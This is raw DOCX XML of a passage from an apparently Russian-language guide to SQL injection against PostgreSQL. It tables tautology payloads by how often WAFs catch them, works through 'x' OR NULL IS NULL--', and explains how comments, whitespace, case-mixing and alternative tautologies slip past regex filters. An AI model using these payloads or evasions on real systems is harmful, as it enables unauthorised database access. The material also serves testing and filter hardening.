              <w:t>Тавтология</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359BC49" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Парсит ли PG</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49929B0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Часто в WAF-blacklist?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="27B97D6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269EC5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>OR 2&lt;3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A5C99B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">да, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>2&lt;3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> → </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>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33F137" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>редко (есть в CRS 942360)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="54F9D80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0CE1FD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>OR NULL IS NULL</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466D45" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">да, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>NULL IS NULL</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> → </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>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DAB90D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>редко</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="38FE72F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E24AA2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>OR 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55EF82" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">да, литерал </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>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D23315" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>иногда (как keyword)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="1FDFA2BB"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E1CE5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>OR 'a'='a'</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F72D86" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">да, если </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> разрешён</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9A2739" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>часто (есть в CRS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="10F1327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729E6C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>OR EXISTS(SELECT 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3481CF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">да, всегда </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>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649D3E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>редко (часть subquery-правил)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="5353F7B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2991AB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>OR (1)+(1)=(2)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5F476" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">да, арифметика → </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>true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401435" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>очень редко</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="575305BD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Payload (в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>q</w:t>
      </w:r>
      <w:r>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="271010D5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>x' OR NULL IS NULL--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6287CF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Что в результате доходит до сервера:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1500CE2B"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'x' OR NULL IS NULL--'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF2036A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>NULL IS NULL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — выражение типа </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>boolean</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, всегда возвращает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (отличие от </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>NULL = NULL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, которое в SQL даёт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>NULL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, а не </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, потому что </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> с NULL — undefined; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>IS NULL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — отдельный оператор, специально для NULL-check). PG-планировщик упрощает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WHERE x OR true</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> до </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WHERE true</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и возвращает все строки.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1179D167" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Альтернативные комбинации, полезные когда блокированы и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>IS NULL</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0963125F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>' OR 'x'='x</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — классика, но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'x'='x'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> часто блокируется как самостоятельная сигнатура.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C47199" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>' OR 0&lt;1--</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — числовое сравнение, не паттерн </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\d=\d</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6346BF11" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>' OR (SELECT true)--</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — subquery, всегда </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C1CC9C4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>' OR length('a')&gt;0--</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — function call с очевидным результатом; полезно когда WAF блокирует и сравнения, и литералы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67752ED4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Анти-паттерн (PG-специфичный): Unicode-whitespace.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> В MySQL и MSSQL некоторые Unicode-пробелы (NBSP U+00A0, em-space U+2003, ideographic space U+3000) лексер трактует как whitespace; в PG </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>нет</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — только пять ASCII-символов из §4.1.1. Если WAF Python-уровня пропускает Unicode-пробел (потому что Python </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>re.UNICODE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ловит NBSP), а PG-парсер ждёт ASCII whitespace — атака сорвётся на парсере PG, не на WAF. Для PG-инъекций Unicode-whitespace бесполезен и опасен (создаёт ложное чувство, что приём сработает).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="159277ED" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Почему этот приём проходит фильтр</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0F6AB5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`/</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">** — PG-лексер удаляет block-comment до этапа разбора синтаксиса, оставляя на месте комментария «логический whitespace». Regex-фильтр работает по символам строки до парсинга — </w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> ≠ </w:t>
      </w:r>
      <w:r>
        <w:t>\s`.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7D70A6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tab/CR</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — Python </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>re</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> их ловит, но bytes-level фильтры (старый ModSecurity, custom-C-санитайзеры) — нет; URL-encoded формы </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>%09</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>%0D</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>%0C</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> после decode остаются непробельными в native byte view фильтра.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50579AC6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Case-mixing</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — атакует Python substring match без </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.upper()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.lower()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> нормализации. Сигнал на пропуск: фильтр не использует </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>re.IGNORECASE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или эквивалент.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD96B2E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Альтернативные тавтологии</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — точечный regex на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>OR 1=1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> не покрывает семантически эквивалентные формы. WAF-вендоры со временем добавляют новые сигнатуры; кастомные blacklist-ы — почти никогда.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF1A7F6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Почему PostgreSQL принимает результат как валидный SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C589EB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Block-comments</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: PG Lexical Structure §4.1.5 — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/* comment */</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> парсится как whitespace. Допускается вложение: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/* /* nested */ */</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — корректно (одна из немногих СУБД, которая поддерживает вложенные комментарии; см. 3.12.1 для эксплойта парсера). Пустой </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/**/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> валиден.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0048D876" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Whitespace alphabet</w:t>
      </w:r>
      <w:r>
        <w:t>: §4.1.1 — список фиксирован: space, tab, newline, CR, form feed. Не Unicode-aware.</w:t>
      </w:r>
    </w:p>
